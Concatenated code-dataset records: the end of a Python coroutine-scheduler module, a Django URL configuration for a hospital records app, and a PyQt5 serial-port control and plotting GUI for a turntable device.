eventdict\n except:\n self.scheduler.unregister(matchers, self.currentroutine)\n raise\n def waitForAllEmpty(self, *queues):\n matchers = [m for m in (q.waitForEmpty() for q in queues) if m is not None]\n while matchers:\n for m in self.waitForAll(*matchers):\n yield m\n matchers = [m for m in (q.waitForEmpty() for q in queues) if m is not None]\n def syscall_noreturn(self, func):\n '''\n Can call without delegate\n '''\n matcher = self.scheduler.syscall(func)\n while not matcher:\n e = RoutineControlEvent(RoutineControlEvent.WAIT, self.currentroutine)\n e.canignore = True\n for m in self.waitForSend(e):\n yield m\n yield (RoutineControlEvent.createMatcher(RoutineControlEvent.WAIT, self.currentroutine),)\n matcher = self.scheduler.syscall(func)\n yield (matcher,)\n def syscall(self, func, ignoreException = False):\n for m in self.syscall_noreturn(func):\n yield m\n if hasattr(self.event, 'exception'):\n raise self.event.exception[1]\n else:\n self.retvalue = self.event.retvalue\n def delegate(self, subprocess):\n '''\n Run a subprocess without container support\n Many subprocess assume itself running in a specified container, it uses container reference\n like self.events. 
Calling the subprocess in other containers will fail.\n        With delegate, you can call a subprocess in any container (or without a container):\n        for m in c.delegate(c.someprocess()):\n            yield m\n        '''\n        def delegateroutine():\n            try:\n                for m in subprocess:\n                    yield m\n            except:\n                typ, val, tb = sys.exc_info()\n                e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, self.currentroutine)\n                e.canignore = True\n                for m in self.waitForSend(e):\n                    yield m\n                raise\n            else:\n                e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, self.currentroutine)\n                e.canignore = True\n                for m in self.waitForSend(e):\n                    yield m\n        r = self.subroutine(generatorwrapper(delegateroutine(), 'subprocess', 'delegate'), True)\n        finish = RoutineControlEvent.createMatcher(RoutineControlEvent.DELEGATE_FINISHED, r)\n        # As long as we do not use self.event to read the event, we are safe to receive them from other containers\n        yield (finish,)\n    def beginDelegateOther(self, subprocess, container, retnames = ('retvalue',)):\n        '''\n        Start the delegate routine, but do not wait for the result; instead, return a matcher for the delegate-finished event.\n        Useful for advanced delegates (e.g. delegating multiple subprocesses at the same time).\n        This is NOT a generator.\n        :param subprocess: a subroutine\n        :param container: container in which to start the routine\n        :param retnames: get return values from keys\n        :returns: (matcher, routine) where matcher is an event matcher to get the delegate result, and routine is the created routine\n        '''\n        def delegateroutine():\n            try:\n                for m in subprocess:\n                    yield m\n            except:\n                typ, val, tb = sys.exc_info()\n                e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, container.currentroutine, exception = val)\n                e.canignore = True\n                for m in container.waitForSend(e):\n                    yield m\n                raise\n            else:\n                e = RoutineControlEvent(RoutineControlEvent.DELEGATE_FINISHED, container.currentroutine,\n                                        result = tuple(getattr(container, n, None) for n in retnames))\n                e.canignore = True\n                for m in container.waitForSend(e):\n                    yield m\n        r = container.subroutine(generatorwrapper(delegateroutine(), 'subprocess', 'delegate'), True)\n        return (RoutineControlEvent.createMatcher(RoutineControlEvent.DELEGATE_FINISHED, r), r)\n    def delegateOther(self, subprocess, container, retnames = ('retvalue',)):\n        '''\n        Another form of delegate that runs a subprocess in another container and retrieves some return values;\n        the subprocess is actually running in 'container'.\n        for m in self.delegateOther(c.method(), c):\n            yield m\n        ret = self.retvalue\n        '''\n        finish, _ = self.beginDelegateOther(subprocess, container, retnames)\n        yield (finish,)\n        if hasattr(self.event, 'exception'):\n            raise self.event.exception\n        for n, v in zip(retnames, self.event.result):\n            setattr(self, n, v)\n    def executeAll(self, subprocesses, container = None, retnames = ('retvalue',), forceclose = True):\n        '''\n        Execute all subprocesses and get the return values. 
Return values are in self.retvalue.\n        :param subprocesses: sequence of subroutines (generators)\n        :param container: if specified, run subprocesses in another container.\n        :param retnames: get return value from container.(name) for each name in retnames.\n        :param forceclose: force close the routines on exit, so all the subprocesses are terminated\n        on timeout if used with executeWithTimeout\n        :returns: a list of tuples, one for each subprocess, with value of retnames inside:\n        [('retvalue1',),('retvalue2',),...]\n        '''\n        if container is None:\n            container = self\n        delegates = [self.beginDelegateOther(p, container, retnames) for p in subprocesses]\n        matchers = [d[0] for d in delegates]\n        try:\n            for m in self.waitForAll(*matchers):\n                yield m\n            events = [self.eventdict[m] for m in matchers]\n            exceptions = [e.exception for e in events if hasattr(e, 'exception')]\n            if exceptions:\n                if len(exceptions) == 1:\n                    raise exceptions[0]\n                else:\n                    raise MultipleException(exceptions)\n            self.retvalue = [e.result for e in events]\n        finally:\n            if forceclose:\n                for d in delegates:\n                    try:\n                        container.terminate(d[1])\n                    except:\n                        pass\n","sub_path":"vlcp/event/runnable.py","file_name":"runnable.py","file_ext":"py","file_size_in_byte":19163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522774373","text":"from django.urls import include, path\nfrom django.views.generic import RedirectView\nfrom . import views\n\nurlpatterns = [\n    path('dashboard/', views.dashboard, name='dashboard'),\n    path('about/', views.about, name='about'),\n    path('contact/', views.contact, name='contact'),\n    \n    # Doctor Records\n    path('view_doctor/', views.view_doctor, name='view_doctor'),\n    path('add_doctor/', views.add_doctor, name='add_doctor'),\n    path('delete_doctor/<int:pk>/', views.delete_doctor, name='delete_doctor'),\n\n    # Patient Records\n    path('view_patient/', views.view_patient, name='view_patient'),\n    path('add_patient/', views.add_patient, name='add_patient'),\n    path('delete_patient/<int:pk>/', views.delete_patient, name='delete_patient'),\n\n    # Appointment\n    path('view_appointment/', views.view_appointment, name='view_appointment'),\n    path('add_appointment/', views.add_appointment, name='add_appointment'),\n    path('delete_appointment/<int:pk>/', views.delete_appointment, name='delete_appointment'),\n\n    path('', RedirectView.as_view(url='dashboard/')),\n]","sub_path":"hospital/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374402095","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Lian Yue\n\nimport sys\nfrom Pro import Ui_MainWindow\nimport serial\nimport qtawesome\nimport serial.tools.list_ports\nfrom PyQt5.QtCore import QTimer\n# from PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QSlider, QMessageBox\n# from PyQt5.QtWidgets import *\n# from PyQt5.QtGui import *\n# from PyQt5 import QtGui\nimport function_file\nimport numpy as np\nimport image\n\n#解决打包时递归超过最大深度问题\n# sys.setrecursionlimit(100000)\n\n# from function_file import data_send_function\n\n\n''' 
\n参考博客\nhttps://www.cnblogs.com/ubuntu1987/archive/2004/01/13/12191633.html\nhttps://www.pythonf.cn/read/108311\nhttps://blog.csdn.net/liuxf196921/article/details/88165399\nhttps://www.jianshu.com/p/d4c0169a28db\nhttps://blog.csdn.net/qq_44880255/article/details/106957320?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~first_rank_v2~rank_v28-3-106957320.nonecase&utm_term=pyqt%20qslider%E5%88%BB%E5%BA%A6%E6%A0%B7%E5%BC%8F&spm=1000.2123.3001.4430\nhttps://blog.csdn.net/fhqlongteng/article/details/78535393\nhttps://zhuanlan.zhihu.com/p/100798858\nhttps://blog.csdn.net/weixin_40796925/article/details/107733966\nhttps://blog.csdn.net/qq_41590417/article/details/80477990\nhttps://blog.csdn.net/weixin_40796925/article/details/107730799 建立 PlotWidget 控件\nhttps://blog.csdn.net/qq_40529853/article/details/100576791 体积问题\n'''\n\n\nclass Pyqt5Serial(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(Pyqt5Serial, self).__init__()\n self.setupUi(self)\n self.init()\n self.setWindowTitle(\"转台上位机V3.0\")\n self.ser = serial.Serial()\n # self.port_check()\n # spin_icon = qtawesome.icon('fa.star', color='darkolivegreen')\n # spin_icon = QtGui.QIcon(':/pic.png')\n spin_icon = qtawesome.icon('fa.star', color='darkolivegreen')\n self.setWindowIcon(spin_icon)\n # 刷新一下串口的列表\n self.refresh()\n\n # Dial表盘\n self.dial.setNotchesVisible(True) # 设置刻度\n self.dial.setPageStep(0.01) # 翻页步长\n # self.dial.setNotchTarget(0.01)\n self.dial.setNotchTarget(5) # 设置刻度密度,即单位刻度所代表的大小\n self.dial.setRange(-180, 180) # 设置范围\n self.dial.setWrapping(True) # 刻度不留缺口\n\n # slider垂直滑动条\n # 设置最小值\n self.verticalSlider.setMinimum(-180)\n # 设置最大值\n self.verticalSlider.setMaximum(180)\n # 设置步长\n self.verticalSlider.setSingleStep(0.01)\n # 设置当前值\n self.verticalSlider.setValue(0)\n # 设置在垂直滑块左侧绘制刻度线\n self.verticalSlider.setTickPosition(QSlider.TicksLeft)\n # 设置刻度间隔\n self.verticalSlider.setTickInterval(0.01)\n\n # 校验位\n lit_on = [0x07, 0x08, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n lit_off = [0x07, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n lit_lock = [0x07, 0x08, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n\n t_on = None\n for i in range(len(lit_on)):\n if i:\n t_on ^= lit_on[i]\n else:\n t_on = lit_on[i] ^ 0\n\n t_off = None\n for i in range(len(lit_off)):\n if i:\n t_off ^= lit_off[i]\n else:\n t_off = lit_off[i] ^ 0\n\n t_lock = None\n for i in range(len(lit_lock)):\n if i:\n t_lock ^= lit_lock[i]\n else:\n t_lock = lit_lock[i] ^ 0\n\n self.active_button = ''\n self.POWER_ON = '55 AA 07 08 80 00 00 00 00 00 00 00 ' + hex(t_on)[2:].zfill(2) + ' F0'\n self.POWER_OFF = '55 AA 07 08 00 00 00 00 00 00 00 00 ' + hex(t_off)[2:].zfill(2) + ' F0'\n self.LOCK = '55 AA 07 08 10 00 00 00 00 00 00 00 ' + hex(t_lock)[2:].zfill(2) + ' F0'\n self.READ_DATA = '55 AA 07 08 00 FF 00 00 00 00 00 00 00 F0'\n # self.SERVO_OFF = '55 AA 07 08 01 01 00 00 00 00 00 00 00 00 F0' 伺服关闭\n\n\n # 绘图\n # self.plotWidget_ted = PlotWidget(self)\n # self.plotWidget_ted.plot([1, 2, 3, 4, 5], pen='r', symbol='o')\n # self.widget.addAction(self.plotWidget_ted)\n # 生成 300 个正态分布的随机数\n # self.data1 = np.random.normal(size=10)\n\n\n def init(self):\n\n # 打开串口按钮\n self.btn_open.clicked.connect(self.port_open)\n # 关闭串口按钮\n self.btn_close.clicked.connect(self.port_close)\n # 发送数据按钮\n # self.btn_send.clicked.connect(self.data_send)\n\n # self.radioButton1.setChecked(True)\n self.radioButton1.toggled.connect(self.button_active)\n self.radioButton2.toggled.connect(self.button_active)\n 
self.radioButton_w.toggled.connect(self.button_active)\n self.pushButton_on.clicked.connect(self.button_active_else)\n self.pushButton_off.clicked.connect(self.button_active_else)\n self.pushButton_lock.clicked.connect(self.button_active_else)\n # self.radioButton6.toggled.connect(self.button_active_else)\n self.btn_open.clicked.connect(self.data_receive)\n self.verticalSlider.valueChanged.connect(self.valueChange_slider)\n self.dial.valueChanged.connect(self.valueChange_dial)\n # 刷新串口外设按钮\n self.pushButton_flash.clicked.connect(self.refresh)\n\n # 定时器接收数据\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.data_receive)\n # self.groupBox_2.plot([1, 2, 3, 4, 5], pen='r', symbol='o')\n\n # self.timer_send = QTimer()\n self.data1 = np.zeros(200)\n # print(self.data1)\n # self.data2 = np.random.normal(size=10)\n self.data2 = np.zeros(200)\n self.data3 = np.zeros(200)\n self.data4 = np.zeros(200)\n self.data5 = np.zeros(200)\n self.data6 = np.zeros(200)\n self.data7 = np.zeros(200)\n self.data8 = np.zeros(200)\n self.data9 = np.zeros(200)\n self.data10 = np.zeros(200)\n\n self.curve1 = self.plotWidget_ted_1.plot(self.data1, pen=\"r\", name=\"mode1\")\n self.curve2 = self.plotWidget_ted_2.plot(self.data2, pen=\"r\", name=\"mode2\")\n self.curve3 = self.plotWidget_ted_3.plot(self.data3, pen=\"r\", name=\"mode3\")\n self.curve4 = self.plotWidget_ted_4.plot(self.data4, pen=\"r\", name=\"mode4\")\n self.curve5 = self.plotWidget1.plot(self.data5, pen=\"w\", name=\"mode5\")\n self.curve6 = self.plotWidget1.plot(self.data6, pen=\"g\", name=\"mode6\")\n self.curve7 = self.plotWidget1.plot(self.data7, pen=\"r\", name=\"mode7\")\n self.curve8 = self.plotWidget2.plot(self.data8, pen=\"w\", name=\"mode8\")\n self.curve9 = self.plotWidget2.plot(self.data9, pen=\"g\", name=\"mode9\")\n self.curve10 = self.plotWidget2.plot(self.data10, pen=\"r\", name=\"mode10\")\n\n self.ptr1 = 0\n self.ptr2 = 0\n self.ptr3 = 0\n self.ptr4 = 0\n self.ptr5 = 0\n self.ptr6 = 0\n self.ptr7 = 0\n self.ptr8 = 0\n self.ptr9 = 0\n self.ptr10 = 0\n\n # # 设定定时器\n # self.timer = pq.QtCore.QTimer()\n # # 定时器信号绑定 update_data 函数\n # self.timer.timeout.connect(self.update_data)\n\n # # 定时器间隔50ms,可以理解为 50ms 刷新一次数据\n # self.timer.start(50)\n\n # 数据左移\n # def update_data(self):\n # data_received = self.data_receive()\n # print('cccccccccccccccccccccccc')\n # print(data_received)\n # # while data_received != [0,0,0,0]:\n # # 线1\n # self.data1[:-1] = self.data1[1:]\n #\n # self.data1[-1] = np.random.normal()\n # self.data1[-1] = data_received[0]\n # print('bbbbbbbbbbbbbbbbbbbbbbbbbbb')\n # print(self.data1)\n # # 数据填充到绘制曲线中\n # self.curve1.setData(self.data1)\n # # x 轴记录点\n # self.ptr1 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve1.setPos(self.ptr1, 0)\n #\n # # 线2\n # self.data2[:-1] = self.data2[1:]\n # # self.data2[-1] = np.random.normal()\n # self.data2[-1] = data_received[1]\n # # 数据填充到绘制曲线中\n # self.curve2.setData(self.data2)\n # # x 轴记录点\n # self.ptr2 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve2.setPos(self.ptr2, 0)\n #\n # # 线3\n # self.data3[:-1] = self.data3[1:]\n # # self.data1[-1] = np.random.normal()\n # self.data3[-1] = data_received[2]\n # # 数据填充到绘制曲线中\n # self.curve3.setData(self.data3)\n # # x 轴记录点\n # self.ptr3 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve3.setPos(self.ptr3, 0)\n #\n # # 线4\n # self.data4[:-1] = self.data4[1:]\n # # self.data1[-1] = np.random.normal()\n # self.data4[-1] = data_received[3]\n # # 数据填充到绘制曲线中\n # self.curve4.setData(self.data4)\n # # x 轴记录点\n # self.ptr4 += 1\n # # 重新设定 x 相关的坐标原点\n # 
self.curve4.setPos(self.ptr4, 0)\n\n\n\n # 刷新一下串口\n def refresh(self):\n # 查询可用的串口\n plist = list(serial.tools.list_ports.comports())\n\n if len(plist) <= 0:\n print(\"No used com!\")\n # self.statusBar.showMessage('没有可用的串口')\n\n else:\n # 把所有的可用的串口输出到comboBox中去\n self.cmb_port_name.clear()\n\n for i in range(0, len(plist)):\n plist_0 = list(plist[i])\n self.cmb_port_name.addItem(str(plist_0[0]))\n\n # 打开串口\n def port_open(self):\n self.ser.port = self.cmb_port_name.currentText()\n self.ser.baudrate = 460800\n self.ser.bytesize = 8\n self.ser.stopbits = 1\n try:\n self.ser.open()\n except:\n QMessageBox.critical(self, \"Port Error\", \"此串口不能被打开!\")\n return None\n\n # 打开串口接收定时器,周期为2ms\n self.timer.start(20)\n\n if self.ser.isOpen():\n self.btn_open.setEnabled(False)\n self.btn_close.setEnabled(True)\n\n # 关闭串口\n def port_close(self):\n try:\n self.ser.close()\n except:\n pass\n self.btn_open.setEnabled(True)\n self.btn_close.setEnabled(False)\n\n # 显示滑动条数据\n def valueChange_slider(self):\n value = self.verticalSlider.value()\n self.data_edit2.setText(str(value))\n\n # 显示圆盘数据\n def valueChange_dial(self):\n # self.dial.setRange(-100, 100) # 设置范围\n # self.dial.setWrapping(False) # 刻度不留缺口\n value = self.dial.value()\n self.data_edit1.setText(str(value))\n\n # def init_data_edit(self):\n # self.data_edit1.setText('0.00')\n # self.data_edit2.setText('0.00')\n\n # 发送数据\n def data_send(self):\n if self.ser.isOpen():\n if self.active_button == '速度运行模式':\n\n input_speed_initial1 = round(float(self.data_edit1.text()) * 100)\n input_speed_initial2 = round(float(self.data_edit2.text()) * 100)\n\n hex_command1, input_speed_form = function_file.data_send_function(input_speed_initial1, input_speed_initial2,\n '03')\n self.ser.write(hex_command1)\n self.show_send.append(input_speed_form)\n\n elif self.active_button == '位置运行模式':\n input_speed_initial1 = round(float(self.data_edit1.text()) * 65536 / 360)\n input_speed_initial2 = round(float(self.data_edit2.text()) * 65536 / 360)\n hex_command1, input_speed_form = function_file.data_send_function(input_speed_initial1, input_speed_initial2,\n '0C')\n self.ser.write(hex_command1)\n self.show_send.append(input_speed_form)\n\n elif self.active_button == '稳定运行模式':\n input_speed_initial1 = round(float(self.data_edit1.text()) * 100)\n input_speed_initial2 = round(float(self.data_edit2.text()) * 100)\n hex_command1, input_speed_form = function_file.data_send_function(input_speed_initial1, input_speed_initial2,\n '60')\n self.ser.write(hex_command1)\n self.show_send.append(input_speed_form)\n\n #接收数据\n def data_receive(self):\n # data1 = []\n # nn = []\n data_s = [0,0,0,0]\n try:\n count = self.ser.inWaiting()\n except:\n self.port_close()\n return data_s\n if count != 0:\n dealStr = ''\n # 读串口数据\n recv = self.ser.read(count)\n print(recv[:1])\n # 在这里将接收到数据进行区分:hex 或 字符串\n # hex 格式:\\xYY\\xYY\\xYY,如果接收到的字符是这种格式,则说明是hex字符,我们需要将\n # \\x去除掉,取出YY,然后组成字符串返回\n # 如果接收到的是字符串,则使用decode进行解码\n print(\"接收到的数据 %s \\n类型为: %s\\n\" % (recv, type(recv)))\n # print(dealStr[12:16])\n # print(type(dealStr[12:16]))\n\n try:\n dealStr = recv.decode()\n except (TypeError, UnicodeDecodeError):\n for i in range(len(recv)):\n # print(recv[i])\n dealStr += hex(recv[i])[2:].zfill(2)\n # print(dealStr)\n dealStr += ' '\n print(\"处理后的数据 %s \\n类型为: %s\\n\" % (dealStr, type(dealStr)))\n print(dealStr[3:5])\n print(dealStr[6:8])\n print(dealStr[9:11])\n print(dealStr[12:14])\n # print(len(dealStr))\n # print(type(len(dealStr)))\n # print(dealStr[:5])\n # print(dealStr[len(dealStr)-3:])\n # dd = 
dealStr[len(dealStr)-3:len(dealStr)-1]\n # print('12345678900')\n # print(dd)\n # print(type(dd))\n print('1333333333333333333333')\n print(dealStr[59:61])\n # 校验位\n lit1 = [\n eval('0x' + dealStr[6:8]),\n eval('0x' + dealStr[9:11]),\n eval('0x' + dealStr[12:14]),\n eval('0x' + dealStr[15:17]),\n eval('0x' + dealStr[18:20]),\n eval('0x' + dealStr[21:23]),\n eval('0x' + dealStr[24:26]),\n eval('0x' + dealStr[27:29]),\n eval('0x' + dealStr[30:32]),\n eval('0x' + dealStr[33:35]),\n eval('0x' + dealStr[36:38]),\n eval('0x' + dealStr[39:41]),\n eval('0x' + dealStr[42:44]),\n eval('0x' + dealStr[45:47]),\n eval('0x' + dealStr[48:50]),\n eval('0x' + dealStr[51:53]),\n eval('0x' + dealStr[54:56]),\n eval('0x' + dealStr[57:59]),\n eval('0x' + dealStr[60:62]),\n eval('0x' + dealStr[63:65]),\n eval('0x' + dealStr[66:68]),\n eval('0x' + dealStr[69:71]),\n eval('0x' + dealStr[72:74]),\n eval('0x' + dealStr[75:77]),\n eval('0x' + dealStr[78:80]),\n eval('0x' + dealStr[81:83]),\n eval('0x' + dealStr[84:86]),\n eval('0x' + dealStr[87:89]),\n eval('0x' + dealStr[90:92]),\n eval('0x' + dealStr[93:95])]\n\n t_12 = None\n for i in range(len(lit1)):\n if i:\n t_12 ^= lit1[i]\n else:\n t_12 = lit1[i] ^ 0\n print('17777777777777777777777777777777777777')\n print(dealStr[len(dealStr) - 39:len(dealStr) - 37])\n print(dealStr[len(dealStr) - 42:len(dealStr) - 40])\n print(len(dealStr))\n # print(dealStr[len(dealStr)-6:len(dealStr)-4])\n print(hex(t_12))\n\n # if dealStr[:5] == '55 aa' and dealStr[len(dealStr)-3:len(dealStr)-1] == 'f0' and len(dealStr) == 66 and hex(t_12)[2:].zfill(2) == dealStr[len(dealStr)-6:len(dealStr)-4]:\n if dealStr[:5] == '55 aa' and dealStr[len(dealStr)-3:len(dealStr)-1] == 'f0' and len(dealStr) == 102 and hex(t_12)[2:].zfill(2) == dealStr[len(dealStr)-6:len(dealStr)-4]:\n dealStr_new = dealStr.replace(' ', '') #去除首尾空格\n print(dealStr_new)\n print(type(dealStr_new))\n recv1 = str(dealStr_new[8:10]) # 当前运行模式\n print(recv1)\n if recv1 == '03':\n self.lineEdit_1.setText('速度运行模式')\n elif recv1 == '0c':\n self.lineEdit_1.setText('位置运行模式')\n elif recv1 == '10':\n self.lineEdit_1.setText('锁定')\n elif recv1 == '60':\n self.lineEdit_1.setText('稳定运行模式')\n elif recv1 == '80':\n self.lineEdit_1.setText('功放上电')\n elif recv1 == '00':\n self.lineEdit_1.setText('功放断电')\n else:\n pass\n recv2 = str(dealStr_new[10:12]) # 转台到位状态\n print(recv2)\n if recv2 == '01':\n self.lineEdit_2.setText('俯仰到位, 方位未到位')\n elif recv2 == '10':\n self.lineEdit_2.setText('俯仰未到位, 方位到位')\n elif recv2 == '11':\n self.lineEdit_2.setText('俯仰、方位均到位')\n elif recv2 == '00':\n self.lineEdit_2.setText('俯仰、方位均未到位')\n print('11111111111111111111111')\n else:\n pass\n\n\n recv3 = '0x' + str(dealStr_new[12:20]) #方位角速度\n recv3_er_new = function_file.data_receive_process(recv3, 32, 14800)\n r_3 = '%.04f' % (round(recv3_er_new, 4))\n self.lineEdit_3.setText(str(r_3))\n\n recv4 = '0x' + str(dealStr_new[20:28]) #俯仰角速度\n recv4_er_new = function_file.data_receive_process(recv4, 32, 14800)\n r_4 = '%.04f'%(round(recv4_er_new, 4))\n self.lineEdit_4.setText(str(r_4))\n\n recv5 = '0x' + str(dealStr_new[28:34]) #方位角度\n recv5_er_new = function_file.data_receive_process(recv5, 24, 1000)\n r_5 = '%.04f'%(round(recv5_er_new, 4))\n self.lineEdit_5.setText(str(r_5))\n\n recv6 = '0x' + str(dealStr_new[34:40]) # 俯仰角度\n recv6_er_new = function_file.data_receive_process(recv6, 24, 1000)\n r_6 = '%.04f'%(round(recv6_er_new, 4))\n self.lineEdit_6.setText(str(r_6))\n###########################################################\n recv7 = '0x' + str(dealStr_new[40:44]) # 
俯仰角度\n recv7_er_new = function_file.data_receive_process(recv7, 16, 1241)\n r_7 = '%.04f' % (round(recv7_er_new, 4))\n\n recv8 = '0x' + str(dealStr_new[44:48]) # 俯仰角度\n recv8_er_new = function_file.data_receive_process(recv8, 16, 1241)\n r_8 = '%.04f' % (round(recv8_er_new, 4))\n\n recv9 = '0x' + str(dealStr_new[48:52]) # 俯仰角度\n recv9_er_new = function_file.data_receive_process(recv9, 16, 1241)\n r_9 = '%.04f' % (round(recv9_er_new, 4))\n##############################################################\n recv10 = '0x' + str(dealStr_new[52:56]) # 俯仰角度\n recv10_er_new = function_file.data_receive_process(recv10, 16, 1241)\n r_10 = '%.04f' % (round(recv10_er_new, 4))\n\n recv11 = '0x' + str(dealStr_new[56:60]) # 俯仰角度\n recv11_er_new = function_file.data_receive_process(recv11, 16, 1241)\n r_11 = '%.04f' % (round(recv11_er_new, 4))\n\n recv12 = '0x' + str(dealStr_new[60:64]) # 俯仰角度\n recv12_er_new = function_file.data_receive_process(recv12, 16, 1241)\n r_12 = '%.04f' % (round(recv12_er_new, 4))\n # self.lineEdit_6.setText(str(r_6))\n # data_s[0] = r_3\n # data_s[1] = r_4\n # data_s[2] = r_5\n # data_s[3] = r_6\n # print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n # print(data_s)\n ## data1\n self.data1[:-1] = self.data1[1:]\n self.data1[-1] = r_3\n\n # 数据填充到绘制曲线中\n self.curve1.setData(self.data1)\n # x 轴记录点\n self.ptr1 += 1\n # 重新设定 x 相关的坐标原点\n\n self.curve1.setPos(self.ptr1, 0)\n # return data_s\n\n # 线2\n self.data2[:-1] = self.data2[1:]\n # self.data2[-1] = np.random.normal()\n self.data2[-1] = r_4\n # 数据填充到绘制曲线中\n self.curve2.setData(self.data2)\n # x 轴记录点\n self.ptr2 += 1\n # 重新设定 x 相关的坐标原点\n self.curve2.setPos(self.ptr2, 0)\n\n # 线3\n self.data3[:-1] = self.data3[1:]\n # self.data1[-1] = np.random.normal()\n self.data3[-1] = r_5\n # 数据填充到绘制曲线中\n self.curve3.setData(self.data3)\n # x 轴记录点\n self.ptr3 += 1\n # 重新设定 x 相关的坐标原点\n self.curve3.setPos(self.ptr3, 0)\n\n # 线4\n self.data4[:-1] = self.data4[1:]\n # self.data1[-1] = np.random.normal()\n self.data4[-1] = r_6\n # 数据填充到绘制曲线中\n self.curve4.setData(self.data4)\n # x 轴记录点\n self.ptr4 += 1\n # 重新设定 x 相关的坐标原点\n self.curve4.setPos(self.ptr4, 0)\n\n # self.plotWidget1.plot(self.data1, name=\"mode2\")\n # self.plotWidget1.setPos(self.ptr4, 0)\n # self.graphicsView_1.plot(self.data3, name=\"mode3\")\n\n # self.curve5.setData(self.data1)\n # self.curve5.setPos(self.ptr4, 0)\n # self.curve5.setData(self.data3)\n self.data5[:-1] = self.data5[1:]\n self.data5[-1] = r_7\n self.data6[:-1] = self.data6[1:]\n self.data6[-1] = r_8\n self.data7[:-1] = self.data7[1:]\n self.data7[-1] = r_9\n self.curve5.setData(self.data5)\n self.curve6.setData(self.data6)\n self.curve7.setData(self.data7)\n self.ptr5 += 1\n self.curve5.setPos(self.ptr5, 0)\n self.ptr6 += 1\n self.curve6.setPos(self.ptr6, 0)\n self.ptr7 += 1\n self.curve7.setPos(self.ptr7, 0)\n # self.curve5.setData(self.data6)\n # self.curve5.setData(self.data3, name=\"mode7\")\n\n self.data8[:-1] = self.data8[1:]\n self.data8[-1] = r_10\n self.data9[:-1] = self.data9[1:]\n self.data9[-1] = r_11\n self.data10[:-1] = self.data10[1:]\n self.data10[-1] = r_12\n self.curve8.setData(self.data8)\n self.curve9.setData(self.data9)\n self.curve10.setData(self.data10)\n self.ptr8 += 1\n self.curve8.setPos(self.ptr8, 0)\n self.ptr9 += 1\n self.curve9.setPos(self.ptr9, 0)\n self.ptr10 += 1\n self.curve10.setPos(self.ptr10, 0)\n # self.data6[:-1] = self.data6[1:]\n # # self.data1[-1] = np.random.normal()\n # self.data6[-1] = r_8\n # self.curve5.setData(self.data6)\n # # self.curve5.setData(self.data3, name=\"mode7\")\n\n\n\n 
else:\n pass\n else:\n pass\n\n\n # nn.append('%.04f' % (round(recv3_er_new, 4)))\n # nn.append('%.04f' % (round(recv4_er_new, 4)))\n # nn.append('%.04f' % (round(recv5_er_new, 4)))\n # nn.append('%.04f' % (round(recv6_er_new, 4)))\n # data1 = np.array(nn)\n # print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n # print(data1)\n # print(type(data1))\n\n # self.c = self.plotWidget_ted_1.plot(data1, name=\"mode2\")\n # # self.ptr1 = 0\n # self.timer.timeout.connect(self.update_data)\n # # # 定时器间隔50ms,可以理解为 50ms 刷新一次数据\n # self.timer.start(50)\n\n # ''' 功放、锁定、伺服选定时直接发送的数据 '''\n # def str_data_send(self):\n # if self.active_button == '功放上电':\n # hex_command = bytes.fromhex(self.POWER_ON)\n # self.ser.write(hex_command)\n # self.show_send.append(self.POWER_ON)\n # elif self.active_button == '功放断电':\n # hex_command = bytes.fromhex(self.POWER_OFF)\n # self.ser.write(hex_command)\n # self.show_send.append(self.POWER_OFF)\n # elif self.active_button == '锁定':\n # hex_command = bytes.fromhex(self.LOCK)\n # self.ser.write(hex_command)\n # self.show_send.append(self.LOCK)\n # elif self.active_button == '取数指令':\n # hex_command = bytes.fromhex(self.READ_DATA)\n # self.ser.write(hex_command)\n # self.show_send.append(self.READ_DATA)\n\n # 位置模式和速度模式按钮动作\n def button_active(self):\n radiobutton = self.sender()\n if radiobutton.text() == '速度运行模式' or radiobutton.text() == '稳定运行模式' or radiobutton.text() == '位置运行模式':\n self.active_button = radiobutton.text()\n self.data_edit1.setText('0.00')\n self.data_edit2.setText('0.00')\n self.data_edit1.setEnabled(True)\n self.data_edit2.setEnabled(True)\n if radiobutton.isChecked() == True:\n print('<' + radiobutton.text() + '>被选中')\n # 发送数据按钮\n print('<' + radiobutton.text() + '>下的数据:')\n self.btn_send.disconnect()\n self.btn_send.clicked.connect(self.data_send)\n else:\n pass\n if radiobutton.text() == '速度运行模式' or radiobutton.text() == '稳定运行模式':\n # Dial表盘\n self.dial.setNotchesVisible(True) # 设置刻度\n self.dial.setPageStep(0.01) # 翻页步长\n # self.dial.setNotchTarget(0.01)\n # 设置当前值\n self.dial.setValue(0)\n self.dial.setNotchTarget(5) # 设置刻度密度,即单位刻度所代表的大小\n self.dial.setRange(-100, 100) # 设置范围\n self.dial.setWrapping(False) # 刻度不留缺口\n\n # slider垂直滑动条\n # 设置最小值\n self.verticalSlider.setMinimum(-100)\n # 设置最大值\n self.verticalSlider.setMaximum(100)\n # 设置步长\n self.verticalSlider.setSingleStep(0.01)\n # 设置当前值\n self.verticalSlider.setValue(0)\n # 设置在垂直滑块左侧绘制刻度线\n self.verticalSlider.setTickPosition(QSlider.TicksLeft)\n # 设置刻度间隔\n self.verticalSlider.setTickInterval(0.01)\n\n elif radiobutton.text() == '位置运行模式':\n # Dial表盘\n self.dial.setNotchesVisible(True) # 设置刻度\n self.dial.setPageStep(0.01) # 翻页步长\n # self.dial.setNotchTarget(0.01)\n # 设置当前值\n self.dial.setValue(0)\n 